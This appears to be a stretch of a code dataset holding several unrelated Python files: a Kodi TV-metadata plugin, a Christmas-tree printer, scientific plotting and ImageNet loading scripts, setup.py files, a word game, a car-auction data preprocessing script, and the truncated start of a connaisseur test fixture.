get_tvshow_metadata_tvdb(tvdb_show)\n tmdb_info = get_tvshow_metadata_tmdb(tmdb_show)\n \n info = {}\n info.update(tvdb_info)\n info.update(dict((k,v) for k,v in tmdb_info.iteritems() if v))\n \n # Prefer translated info\n if LANG != \"en\":\n for key in ('name', 'title', 'plot'):\n if is_ascii(info.get(key,'')) and not is_ascii(tvdb_info.get(key,'')):\n info[key] = tvdb_info[key]\n \n tvdb_id = info['tvdb_id']\n \n context_menu = [\n ( \n _(\"Add to library\"),\n \"RunPlugin({0})\".format(plugin.url_for(\"tv_add_to_library\", id=tvdb_id))\n ),\n (\n _(\"Show info\"), 'Action(Info)'\n )\n ]\n \n return {'label': info['title'],\n 'path': plugin.url_for(tv_tvshow, id=tvdb_id),\n 'context_menu': context_menu,\n 'thumbnail': info['poster'],\n 'icon': \"DefaultVideo.png\",\n 'poster': info['poster'],\n 'properties' : {'fanart_image' : info['fanart']},\n 'info_type': 'video',\n 'info': info}\n \n@plugin.cached(TTL=CACHE_TTL)\ndef list_seasons_tvdb(id):\n import_tvdb()\n id = int(id)\n \n show = tvdb[id]\n show_info = get_tvshow_metadata_tvdb(show, banners=False)\n \n context_menu = [ ( _(\"Show info\"), 'Action(Info)' ) ]\n \n items = []\n for (season_num, season) in show.items():\n if season_num == 0 or not season.has_aired():\n continue\n \n season_info = get_season_metadata_tvdb(show_info, season)\n \n items.append({'label': u\"%s %d\" % (_(\"Season\"), season_num),\n 'path': plugin.url_for(tv_season, id=id, season_num=season_num),\n 'context_menu': context_menu,\n 'info': season_info,\n 'thumbnail': season_info['poster'],\n 'icon': \"DefaultVideo.png\",\n 'poster': season_info['poster'],\n 'properties' : {'fanart_image' : season_info['fanart']},\n })\n return items\n \n@plugin.cached(TTL=CACHE_TTL)\ndef list_episodes_tvdb(id, season_num):\n import_tvdb()\n id = int(id)\n season_num = int(season_num)\n\n show = tvdb[id]\n show_info = get_tvshow_metadata_tvdb(show, banners=False)\n\n season = show[season_num]\n season_info = get_season_metadata_tvdb(show_info, season, banners=True)\n \n items = []\n for (episode_num, episode) in season.items():\n if episode_num == 0 or not episode.has_aired():\n continue\n \n episode_info = get_episode_metadata_tvdb(season_info, episode)\n \n context_menu = [\n (\n _(\"Select stream...\"),\n \"PlayMedia({0})\".format(plugin.url_for(\"tv_play\", id=id, season=season_num, episode=episode_num, mode='select'))\n ),\n (\n _(\"Show info\"),\n 'Action(Info)'\n )\n ]\n \n items.append({'label': episode_info.get('title'),\n 'path': plugin.url_for(\"tv_play\", id=id, season=season_num, episode=episode_num, mode='default'),\n 'context_menu': context_menu,\n 'info': episode_info,\n 'is_playable': True,\n 'info_type': 'video',\n 'thumbnail': episode_info['poster'],\n 'poster': season_info['poster'],\n 'icon': \"DefaultVideo.png\",\n 'properties' : {'fanart_image' : episode_info['fanart']},\n })\n\n return items\n\ndef get_tvshow_metadata_tmdb(tmdb_show):\n info = {}\n\n if tmdb_show is None:\n return info\n \n genres = get_genres()\n \n info['tmdb'] = str(tmdb_show['id'])\n info['name'] = tmdb_show['name']\n info['title'] = tmdb_show['name']\n info['tvshowtitle'] = tmdb_show['original_name']\n info['originaltitle'] = tmdb_show['original_name']\n info['genre'] = u\" / \".join([genres[x] for x in tmdb_show['genre_ids'] if x in genres])\n info['plot'] = tmdb_show['overview']\n info['rating'] = str(tmdb_show['vote_average'])\n info['votes'] = str(tmdb_show['vote_count'])\n \n \n if tmdb_show['poster_path']:\n info['poster'] = u'%s%s' % (\"http://image.tmdb.org/t/p/w500\", tmdb_show['poster_path'])\n else:\n info['poster'] = ''\n \n if tmdb_show['backdrop_path']:\n info['fanart'] = u'%s%s' % (\"http://image.tmdb.org/t/p/original\", tmdb_show['backdrop_path']) \n else:\n info['fanart'] = ''\n \n return info\n \ndef tmdb_to_tvdb(tmdb_show):\n tvdb_show = None\n \n # Search by name and year\n name = tmdb_show['original_name']\n year = int(parse_year(tmdb_show['first_air_date']))\n results = [x['id'] for x in tvdb.search(name, year)]\n \n # Get by id if not a single result\n if len(results) != 1: \n id = tmdb.TV(tmdb_show['id']).external_ids().get('tvdb_id', None)\n if id:\n results = [id]\n \n # Use first result if still have many\n if results:\n tvdb_show = tvdb[results[0]]\n \n return tvdb_show, tmdb_show\n","sub_path":"plugin.video.meta/resources/lib/meta/navigation/tvshows.py","file_name":"tvshows.py","file_ext":"py","file_size_in_byte":11912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"604275360","text":"# # mini_loop don't know what mini_loop'm doing here xD mini_loop was trying to create a function that would print a single row with randomisation and then use that as part of the major function to build up the tree... \n\n# def ornaments(total): \n# ornaments_available = [\"#\", \"0\"] \n# total = int(total) \n# mini_loop = 0\n# while mini_loop != total:\n# print(\"\", end=\"\", flush=True) # this magic prints just the space with no newline \n# print(random.choice(ornaments_available), end=\"\", flush=True)\n# print(\"\")\n# mini_loop = mini_loop + 1\n\n# def regular_tree(crown_height):\n \n# mini_loop = 1\n# crown_height = int(crown_height)\n# trunk = int(crown_height - 1)\n# odd_number = mini_loop\n\n# def ornaments(total): \n# ornaments_available = [\"#\", \"0\"] \n# total = int(total) \n# mini_loop = 0\n# while mini_loop != total:\n# print(\"\", end=\"\", flush=True) # this magic prints just the space with no newline \n# print(random.choice(ornaments_available) * mini_loop, end=\"\", flush=True)\n# print(\"\")\n# mini_loop = mini_loop + 1\n\n \n\n# while mini_loop <= crown_height:\n# print(ornaments(mini_loop))\n# odd_number = odd_number + 2\n# mini_loop = mini_loop + 1\n\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n\n# print(\"how tall do you want the crown of your tree to be?\")\n# regular_tree(input())\n\n# ------ old code ------\n\n\n# import random\n\n# def regular_tree(crown_height):\n\n# mini_loop = 1\n# crown_height = int(crown_height)\n# trunk = int(crown_height - 1)\n# odd_number = mini_loop\n# ornaments = [\"#\", \"0\"] \n\n# while mini_loop <= crown_height:\n# print(\" \" * (crown_height - mini_loop), end = \"\", flush=True) #this generates the spaces to create the right angle\n# print(random.choice(ornaments) * odd_number)\n# odd_number = odd_number + 2\n# mini_loop = mini_loop + 1\n\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n\n# print(\"how tall do you want the crown of your tree to be?\")\n# regular_tree(input())\n\n\n# # old, working version-----------------------\n\n# import random\n\n# def print_christmas_tree(crown_height):\n\n# mini_loop = 0\n# ornaments = [\"#\", \"0\"]\n\n# while mini_loop <= int(crown_height) - 1: # this thing here prints the rows with ornaments\n\n# # print(\" \", end = \"\", flush=True) # this magic prints just the space with no newline \n# print(random.choice(ornaments), end = \"\", flush=True)\n# mini_loop = mini_loop + 1\n\n# print(\"\")\n\n# print_christmas_tree(input())\n\n# ---------------------\n\n# import random\n\n# def print_christmas_tree(crown_height):\n\n# mini_loop = 0\n# master_loop = 0\n# ornaments = [\"#\", \"0\"]\n# crown_len = 0\n# trunk = int(crown_height) - 1\n\n# while master_loop <= int(crown_height) - 1:\n# mini_loop = 0\n# print(\" \" * (int(crown_height) - crown_len), end=\"\", flush=True)\n\n# while mini_loop <= crown_len: # this thing here prints the rows with ornaments\n# print(random.choice(ornaments) * 2, end = \"\", flush=True)\n# mini_loop = mini_loop + 1\n \n# crown_len = crown_len + 1\n# master_loop = master_loop + 1\n# print(\"\")\n\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n\n\n# print_christmas_tree(input())\n\n# # # -------- that almost worked ^^^^ ----------\n\nimport random\nimport time\n\nf = False\n\ndef row_gen(crown_len): #this function generates a row\n ornaments = [\"#\", \"#\", \"#\", \"0\"]\n loop = 0\n crown_len = int(crown_len)\n\n while loop <= crown_len:\n print(random.choice(ornaments), end = \"\", flush=f)\n print(\"\", end=\"\", flush=f)\n loop = loop + 1 \n\ndef xmas_tree(height): #given a number, this function prints a sequence of randomised rows\n loop = 1\n height = int(height)\n length = 0\n trunk = int(height) - 1\n\n\n while loop <= height:\n print(\" \" * (height - loop) , end = \"\", flush=f)\n row_gen(length)\n print(\"\", flush = f)\n\n #here are the counters for this loop\n loop = loop + 1\n length = length + 2\n\n print(\" \" * trunk, end=\"\", flush=f)\n print(\"#\", flush = f)\n print(\" \" * trunk, end=\"\", flush=f)\n print(\"#\", flush = True)\n\nxmas_tree(input())\n\n# while True:\n# xmas_tree(11)\n# time.sleep(1.0 / 30)\n","sub_path":"python/xmas tree/xmas-tree-stretch.py","file_name":"xmas-tree-stretch.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"532858314","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nimport os\nimport itertools\nimport warnings\n\nwarnings.filterwarnings(action=\"ignore\", module=\"scipy\", message=\"^internal gelsd\")\n\ncca_dir = '/Users/tomlinsonk/Projects/Research/cca/'\n\nneighborhoods = ['vn', 'moore']\nsizes = [128, 256, 512]\n\nvn_range = range(7, 16)\nmoore_range = range(11, 20)\n\n\ndef linear_model(x, m, b):\n return m * x + b\n\n\n# ax = plt.axes()\n# ax.set_yscale('log')\n# ax.set_xscale('log')\n# \ndef plot(phase, data, neighborhood):\n if neighborhood == 'moore':\n k_range = moore_range\n log_range = np.log(moore_range)\n elif neighborhood == 'vn':\n k_range = vn_range\n log_range = np.log(vn_range)\n\n log_means = [np.log(np.mean(data[k])) for k in k_range]\n\n for k in k_range:\n for point in data[k]:\n if point < 0:\n print('AH', point)\n\n log_data = [point for k in k_range for point in np.log(data[k])]\n log_k = [np.log(k) for k in k_range for point in np.log(data[k])]\n\n log_error = [np.std(data[k], ddof=1) / np.mean(data[k]) for k in k_range]\n # print(log_error)\n\n popt, pcov = curve_fit(linear_model, log_k, log_data)\n print('log {} = ({:3f} +- {:3f}) log k + {:3f} +- {:3f}'.format(phase, popt[0], pcov[0][0], popt[1], pcov[1][1]))\n\n plt.figure(figsize=(4, 3))\n # plt.scatter(log_k + np.random.normal(0, 0.01, len(log_k)), log_data, alpha=0.1)\n plt.plot(log_range, linear_model(log_range, *popt), 'r')\n plt.errorbar(log_range, log_means, yerr=log_error, fmt='b.', capsize=3)\n # plt.title('{0} Phase Length ({1}x{1} grid, {2} neighborhood)'.format(phase, size,\n # 'Von Neuman' if neighborhood == 'vn' else 'Moore'))\n plt.xlabel('log k')\n plt.ylabel('log {} Phase Length'.format(phase))\n os.makedirs(cca_dir + 'plots/phase_lengths/', exist_ok=True)\n plt.savefig(cca_dir + 'plots/phase_lengths/{}_{}_{}.pdf'.format(size, neighborhood, phase.lower()),\n bbox_inches='tight')\n\n try:\n plt.show()\n except KeyboardInterrupt:\n exit()\n\n\ndef plot_grid_sizes(phase, data_128, data_256, data_512, neighborhood):\n if neighborhood == 'moore':\n k_range = moore_range\n log_range = np.log(moore_range)\n elif neighborhood == 'vn':\n k_range = vn_range\n log_range = np.log(vn_range)\n\n colors = ['red', 'green', 'blue']\n\n plt.figure(figsize=(4, 3))\n\n sizes = [128, 256, 512]\n\n for i, data in enumerate([data_128, data_256, data_512]):\n log_data = [np.log(np.mean(data[k])) for k in data]\n log_error = [np.std(data[k], ddof=1) / np.mean(data[k]) for k in data]\n\n popt, pcov = curve_fit(linear_model, log_range, log_data)\n # print(pcov)\n\n plt.plot(log_range + (i-1) / 75, linear_model(log_range, *popt), color=colors[i], label='{0}x{0}'.format(sizes[i]))\n plt.errorbar(log_range + (i-1) / 75, log_data, yerr=log_error, fmt='.', capsize=3, color=colors[i])\n\n plt.xlabel('log k')\n plt.ylabel('log {} Phase Length'.format(phase))\n if phase == 'Defect':\n plt.legend(loc='lower right', fontsize=10, title='Grid size')\n os.makedirs(cca_dir + 'plots/phase_lengths/', exist_ok=True)\n plt.savefig(cca_dir + 'plots/phase_lengths/all_sizes_{}_{}.pdf'.format(neighborhood, phase.lower()),\n bbox_inches='tight')\n\n plt.show()\n\n\ndef single(neighborhood, size):\n # Getting back the objects:\n with open(cca_dir + 'pickles/{}_{}.pkl'.format(size, neighborhood), 'rb') as f:\n debris_lengths, droplet_lengths, defect_lengths = pickle.load(f)\n\n plot('Debris', debris_lengths, neighborhood)\n plot('Droplet', droplet_lengths, neighborhood)\n plot('Defect', defect_lengths, neighborhood)\n\n\ndef compare(neighborhood):\n with open(cca_dir + 'pickles/128_{}.pkl'.format(neighborhood), 'rb') as f:\n debris_128, droplet_128, defect_128 = pickle.load(f)\n\n with open(cca_dir + 'pickles/256_{}.pkl'.format(neighborhood), 'rb') as f:\n debris_256, droplet_256, defect_256 = pickle.load(f)\n\n with open(cca_dir + 'pickles/512_{}.pkl'.format(neighborhood), 'rb') as f:\n debris_512, droplet_512, defect_512 = pickle.load(f)\n\n # print(debris_128)\n\n plot_grid_sizes('Debris', debris_128, debris_256, debris_512, neighborhood)\n plot_grid_sizes('Droplet', droplet_128, droplet_256, droplet_512, neighborhood)\n plot_grid_sizes('Defect', defect_128, defect_256, defect_512, neighborhood)\n\n\nif __name__ == '__main__':\n for neighborhood, size in itertools.product(neighborhoods, sizes):\n print('Plotting {} {}...'.format(neighborhood, size))\n single(neighborhood, size)\n\n for neighborhood in neighborhoods:\n print('Comparing sizes for {}...'.format(neighborhood))\n compare(neighborhood)\n","sub_path":"code/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"513043825","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2016 matsumoto \n#\n# Distributed under terms of the MIT license.\n\nimport os\nimport random\n\nimport numpy as np\n\nfrom tqdm import tqdm\n\n\nHOME = os.environ['HOME']\nFEATURE_DIR = HOME + '/mnt/ILSVRC2012/feature_vgg_da/'\n# FEATURE_DIR = HOME + '/mnt/ILSVRC2012/feature/'\nFILE_LIST = HOME + '/mnt/ILSVRC2012/val_list.txt'\n\n\ndef load_imagenet(concept_id, pos_neg, pos_num):\n # neg_num = pos_num\n neg_num = 10000\n data = []\n features = os.listdir(FEATURE_DIR + concept_id)\n if concept_id == 'val':\n for feature in tqdm(random.sample(features, neg_num)):\n image_vec = np.load(FEATURE_DIR + concept_id + '/' + feature)\n # data.append(image_vec[0])\n for image in image_vec:\n data.append(image)\n else:\n i = 0\n for feature in tqdm(features):\n image_vec = np.load(FEATURE_DIR + concept_id + '/' + feature)\n i += 1\n # data.append(image_vec[0])\n for image in image_vec:\n data.append(image)\n np_data = np.array(data, dtype=np.float32)\n size = np_data.shape[0]\n np_target = np.array([pos_neg] * size, dtype=np.float32)\n # np_target = np.array([[pos_neg] * 10] * size, dtype=np.float32)\n # imagenet = {'data': np_data, 'target': np_target}\n if concept_id == 'val':\n return np_data, np_target\n return np_data, np_target, i\n\n\ndef load_imagenet_data(pos_concept_id, neg_concept_id):\n pos_data, pos_target, pos_num = load_imagenet(pos_concept_id, 0, 0)\n neg_data, neg_target = load_imagenet(neg_concept_id, 1, pos_num)\n # imagenet = {'data': np.r_[pos_data, neg_data], 'target': np.r_[pos_target,\n # neg_target]}\n return pos_data, pos_target, neg_data, neg_target\n # return imagenet\n","sub_path":"net_still/data_ori.py","file_name":"data_ori.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"66236626","text":"# Gather input from the user\r\nnumber = int(input(\"Find the square root of integer: \"))\r\nguess = int(input(\"Initial guess: \"))\r\ntolerance = float(input(\"What tolerance: \"))\r\n\r\ncount = 0 # count the number of guesses\r\nprevious = 0 # track the previous calculated value\r\n\r\n# Until we are within tolerance, keep inching our way towards the square root\r\nwhile abs(previous - guess) > tolerance:\r\n previous = guess\r\n quotient = number / guess\r\n guess = (quotient + guess) / 2\r\n count += 1\r\n\r\nprint(\"Square root of\", number, \"is\", round(guess, 4))\r\nprint(\"Took\", count, \"reps to get it to tolerance\")","sub_path":"assignments/algorithms/advanced/babylonian_sqrt.py","file_name":"babylonian_sqrt.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"425651385","text":"from setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"tf-keras-vis\",\n version=\"0.6.1\",\n author=\"keisen\",\n author_email=\"k.keisen@gmail.com\",\n description=\"Neural network visualization toolkit for tf.keras\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/keisen/tf-keras-vis\",\n packages=find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6, <3.10',\n install_requires=['scipy', 'pillow', 'deprecated', 'imageio', 'packaging'],\n extras_require={\n 'develop': ['flake8', 'isort', 'yapf', 'pytest', 'pytest-pycodestyle', 'pytest-cov'],\n 'examples': ['jupyterlab==2.*', 'jedi==0.17.*', 'matplotlib'],\n },\n include_package_data=True,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"341390439","text":"import os\n\nfrom setuptools import setup, Command\n\nversion = \"0.2.0\"\n\ndef readme():\n with open(\"README.md\") as r:\n return r.read()\n\n\nclass VersionCommand(Command):\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n print(version)\n\n\nsetup(\n name='classyconf',\n version=version,\n description='Extensible library for separation of settings from code.',\n long_description=readme(),\n long_description_content_type='text/markdown',\n author=\"Hernan Lozano\", author_email=\"hernantz@gmail.com\",\n license=\"MIT\",\n packages=['classyconf'],\n platforms='any',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Framework :: Django',\n 'Framework :: Flask',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Libraries',\n ],\n url='http://github.com/hernantz/classyconf',\n project_urls={\n \"Documentation\": \"https://classyconf.readthedocs.io/en/latest/\"\n },\n download_url='https://github.com/hernantz/classyconf/tarball/{}'.format(version),\n cmdclass={'version': VersionCommand},\n test_suite=\"tests\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"199894028","text":"\"\"\"\r\nStudent code for Word Wrangler game\r\n\"\"\"\r\n# avoiding use of set, sorted, or sort to focus on ordered lists and recursion\r\n\r\nimport urllib2\r\nimport codeskulptor\r\nimport poc_wrangler_provided as provided\r\n\r\nWORDFILE = \"assets_scrabble_words3.txt\"\r\ncodeskulptor.set_timeout(15)\r\n\r\n# Functions to manipulate ordered word lists\r\n\r\ndef remove_duplicates(list1):\r\n \"\"\"\r\n Eliminate duplicates in a sorted list.\r\n\r\n Returns a new sorted list with the same elements in list1, but\r\n with no duplicates.\r\n\r\n This function can be iterative.\r\n \"\"\"\r\n newlist = [list1[0]]\r\n comparison = list1[0]\r\n for item in list1:\r\n if comparison != item:\r\n newlist.append(item)\r\n comparison = item\r\n return newlist\r\n\r\ndef intersect(list1, list2):\r\n \"\"\"\r\n Compute the intersection of two sorted lists.\r\n\r\n Returns a new sorted list containing only elements that are in\r\n both list1 and list2.\r\n\r\n This function can be iterative.\r\n \"\"\"\r\n intersection = []\r\n for item in list1:\r\n if item in list2:\r\n intersection.append(item)\r\n return intersection\r\n\r\n# Functions to perform merge sort\r\n\r\ndef merge(list1, list2):\r\n \"\"\"\r\n Merge two sorted lists.\r\n\r\n Returns a new sorted list containing those elements that are in\r\n either list1 or list2.\r\n\r\n This function can be iterative.\r\n \"\"\"\r\n merged_list = []\r\n \r\n while len(list1) != 0 or len(list2) != 0:\r\n if len(list1) == 0:\r\n merged_list = merged_list + list2\r\n list2 = []\r\n elif len(list2) == 0:\r\n merged_list = merged_list + list1\r\n list1 = []\r\n elif list1[0] <= list2[0]:\r\n merged_list.append(list1[0])\r\n list1.remove(list1[0])\r\n else:\r\n merged_list.append(list2[0])\r\n list2.remove(list2[0])\r\n \r\n return merged_list\r\n\r\ndef merge_sort(list1):\r\n \"\"\"\r\n Sort the elements of list1.\r\n\r\n Return a new sorted list with the same elements as list1.\r\n\r\n This function should be recursive.\r\n \"\"\"\r\n if len(list1) == 1:\r\n return list1\r\n else:\r\n half_length = len(list1)/2\r\n half1 = merge_sort(list1[:half_length])\r\n half2 = merge_sort(list1[half_length:])\r\n return merge(half1, half2)\r\n\r\n# Function to generate all strings for the word wrangler game\r\ndef gen_all_strings(word):\r\n \"\"\"\r\n Generate all strings that can be composed from the letters in word\r\n in any order.\r\n\r\n Returns a list of all strings that can be formed from the letters\r\n in word.\r\n\r\n This function should be recursive.\r\n \"\"\"\r\n\r\n if word == \"\":\r\n return [\"\"]\r\n \r\n else:\r\n first = word[0]\r\n rest = word[1:]\r\n rest_strings = gen_all_strings(rest)\r\n new_words = []\r\n for item in rest_strings:\r\n for letter in range(len(item) + 1):\r\n new_words.append(item[:letter] + first + item[letter:])\r\n return rest_strings + new_words\r\n \r\n\r\n\r\n# Function to load words from a file\r\n\r\ndef load_words(filename):\r\n \"\"\"\r\n Load word list from the file named filename.\r\n\r\n Returns a list of strings.\r\n \"\"\"\r\n word_list = []\r\n words = codeskulptor.file2url(WORDFILE)\r\n netfile = urllib2.urlopen(words)\r\n for line in netfile.readlines():\r\n word_list.append(line[:-1]) \r\n return word_list\r\n\r\ndef run():\r\n \"\"\"\r\n Run game.\r\n \"\"\"\r\n words = load_words(WORDFILE)\r\n wrangler = provided.WordWrangler(words, remove_duplicates, \r\n intersect, merge_sort, \r\n gen_all_strings)\r\n provided.run_game(wrangler)\r\n\r\n# Uncomment when you are ready to try the game\r\nrun()\r\n","sub_path":"WordWrangler.py","file_name":"WordWrangler.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"93455750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 17:29:50 2019\n\n@author: n8891974\n\"\"\"\n\n# Imports\nimport pandas as pd\nimport numpy as np\nimport scipy.stats as stats\n\n# Import plotting libraries\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Import ML libraries\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.model_selection import GridSearchCV\nrs = 10 # Set a random state const\n\n\n# Ignore Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n### Globals ###\n\n\n# Do the data analysis\ndata = pd.read_csv(\"Kick.csv\", \n index_col = 'PurchaseID', \n na_values = ('?', '#VALUE!'))\n\ndef PreProcessing (data):\n print(\"Pre-Processing Step\")\n \n # Check if there are any missing target variables\n if data['IsBadBuy'].isnull().values.any() == True:\n print(\"Missing Target Variables\")\n else:\n print(\"No missing Target Variables\")\n \n \n # Handle Bad Columns drop Columns\n print(\"Drop PRIMEUNIT due to insufficient data amount\")\n print(\"Drop AUCGUART due to insufficient and data amount and leaky data\")\n print(\"Drop WheelTypeID due to it being a duplicate of WheelType\")\n print(\"Drop ForSale due to data skew\")\n print(\"Drop PurchaseDate due to it being a duplicate of PurchaseTimeStamp\")\n data.drop(['PRIMEUNIT', 'AUCGUART', 'WheelTypeID', 'ForSale', 'PurchaseDate'], \n axis=1, \n inplace=True)\n \n \n # Handle Missing Values\n i = 0 # Python's indexing starts at zero\n for item in data['TopThreeAmericanName']: # Python's for loops are a \"for each\" loop \n if data['TopThreeAmericanName'][i] == np.nan and data['Make'][i] == 'Hyundai':\n data['TopThreeAmericanName'][i] = 'HYUNDAI'\n i += 1\n \n i = 0 # Python's indexing starts at zero\n for item in data['TopThreeAmericanName']: # Python's for loops are a \"for each\" loop \n if data['TopThreeAmericanName'][i] == np.nan and data['Make'][i] == 'Jeep':\n data['TopThreeAmericanName'][i] = 'JEEP'\n i += 1\n \n \n \"\"\" DOES THIS HAVE TO BE THERE \"\"\"\n # print(data.groupby(['TopThreeAmericanName'])['Make'].value_counts())\n \"\"\" DOES THIS HAVE TO BE THERE \"\"\"\n \n \n \n # Standardise the capitilization across all object rows\n obj_cols = data.select_dtypes(include='object').columns # Create a list of col names\n for i in obj_cols: # Interate over the obj_cols list\n data[i] = data[i].str.upper() # Convert all strings to uppercase\n \n # Standardize USA to AMERICA\n data['Nationality'].replace({'USA' : 'AMERICAN'}, inplace = True)\n \n # Turn Transmission into a binary variable with Auto = 1 and Manual = 0\n data.rename({'Transmission' : 'Auto'}, axis = 1, inplace = True)\n # Replace binary columns with 1s and 0s\n data['Auto'].replace({'MANUAL' : 0, 'AUTO' : 1}, inplace=True)\n \n # Remove NOT AVAIL in color and place it in the NaN section\n data['Color'].replace({'NOT AVAIL': np.nan}, inplace = True)\n \n \n \"\"\" I'll have to check with teach if this is correct\n #This is the significance test for VNST\n # Check to see if VNST is a statisically significant variable\n # Create a distribution of IsBuyBad for VNST\n VNST_badBuy = pd.crosstab(data['IsBadBuy'], data['VNST']).loc[0]\n VNST_goodBuy = pd.crosstab(data['IsBadBuy'], data['VNST']).loc[1]\n categoricalPlot('VNST')\n \n # Use a Chi2 test to test if there is any corrilation between them, if there is\n # (p < 0.05) discarde the variable\n fScore, pValue = stats.f_oneway(VNST_badBuy, VNST_goodBuy)\n print(\"The pValaue is \" + str(pValue) + \" which is significant enough to reject null hypothesis\")\n \"\"\"\n print(\"Drop VNST due to statistical insignificance\")\n data.drop('VNST', axis=1, inplace = True)\n \n \n # Seperate the Size feature into Size and Body\n tempSize = data['Size'].str.split(' ', expand = True) # Create temp var with split column\n data['Size'] = tempSize[0] # Save the temp var back into data\n data['Body'] = tempSize[1] # Save the temp var back into data\n data['Body'].fillna('CITY', inplace = True) # Assume any other cars are 'City'\n data.loc[data.Size == 'VAN', 'Body'] = 'Van' # Convert Van into a body type\n data.loc[data.Size == 'VAN', 'Size'] = np.nan # Take van away from size, shouldn't matter once OH is done\n \n \n # Replace all non 0, 1 values in IsOnlineSale to 1\n maskOnlineSale = data['IsOnlineSale'] != 0 # Any value that isn't 0 will be set to 1\n data.loc[maskOnlineSale, 'IsOnlineSale'] = 1 # Set the values to 1\n \n \n # Converting the TimeStamp into Quater\n Quater = [] # Create empty string\n for i, _ in enumerate(data.PurchaseTimestamp): # Loop over the entire dataset\n # Convert the epoch datetime into the quater and append to list\n Quater.append(pd.Timestamp(data.PurchaseTimestamp.loc[i], unit = 's').quarter) \n data['Quater'] = Quater # Create the column with list\n data.drop('PurchaseTimestamp', axis=1, inplace = True) # Drop old TimeStamp\n \n \n \n \"\"\" This will take care of any Null values we don't specifically take care of\n by replaceing the missing data with data from the same distibution\"\"\"\n for i in data.columns: # Loop over dataset\n if data[i].isna().any(): # Check to see if there is a NaN is the feature\n dist = data[i].value_counts(normalize=True) # Find the distrabution of the column\n missing = data[i].isna() # Find where the NaN are\n # Replace the NaNs with values from the same distrabution of the column\n data.loc[missing, i] = np.random.choice(dist.index, size=len(data[missing]),p=dist.values) \n print(\"Converted all of \" + i + \"s missing values into the same distrubution\")\n \n \n \"\"\" This should be the last thing done \"\"\"\n # Convert all categorical variables into one hot representations\n \n print(\"The number of features before one hot encoding is \" + str(data.shape[1]))\n data_OH = pd.get_dummies(data, columns = ['Auction', 'Make', 'Color', 'VehYear', \n 'Nationality', 'Size', 'Body', 'TopThreeAmericanName', \n 'WheelType', 'Quater'])\n print(\"The number of features after one hot encoding is \" + str(data_OH.shape[1]))\n \n \n return data, data_OH\n\n\n# Define a function to plot catgorical variables with relation to another cat, default is IsBadBuy\ndef categoricalPlot(cat, cat2 = 'IsBadBuy'): # Cat is the carigorical as a string i.e 'Size'\n pd.crosstab(data[cat],data[cat2]).plot(kind=\"bar\")\n\n\ndef Question1(data):\n print(\"Question 1.\")\n \n # check to see if the are any odd labaels\n \n counts = data[\"IsBadBuy\"].value_counts()\n total = data[\"IsBadBuy\"].count()\n \n # calculate the percentage\n # kick is where IsBadBuy == 1\n kickPersentage = counts[1] / total * 100\n print (\"Questin 1.1 :\")\n print( kickPersentage, \"%\")\n \n\n### RUN THE OUTPUT ###\ndata, data_OH = PreProcessing(data)\nQuestion1(data)","sub_path":"Assignment_1/DMProj1.py","file_name":"DMProj1.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549430778","text":"import os\nimport pytest\nfrom flask import Flask\nimport json\nfrom connaisseur.image import Image\nfrom connaisseur.exceptions import NotFoundException\nimport connaisseur.flask_server as fs\nimport connaisseur.policy as policy\nimport connaisseur.kube_api as api\nimport connaisseur.mutate as mutate\nfrom requests.exceptions import HTTPError\n\n\n@pytest.fixture\ndef mock_kube_request(monkeypatch):\n def m_request(path: str):\n name = path.split(\"/\")[-1]\n try:\n return get_file_json(f\"tests/data/{name}.json\")\n except FileNotFoundError:\n raise HTTPError\n\n monkeypatch.setattr(api, 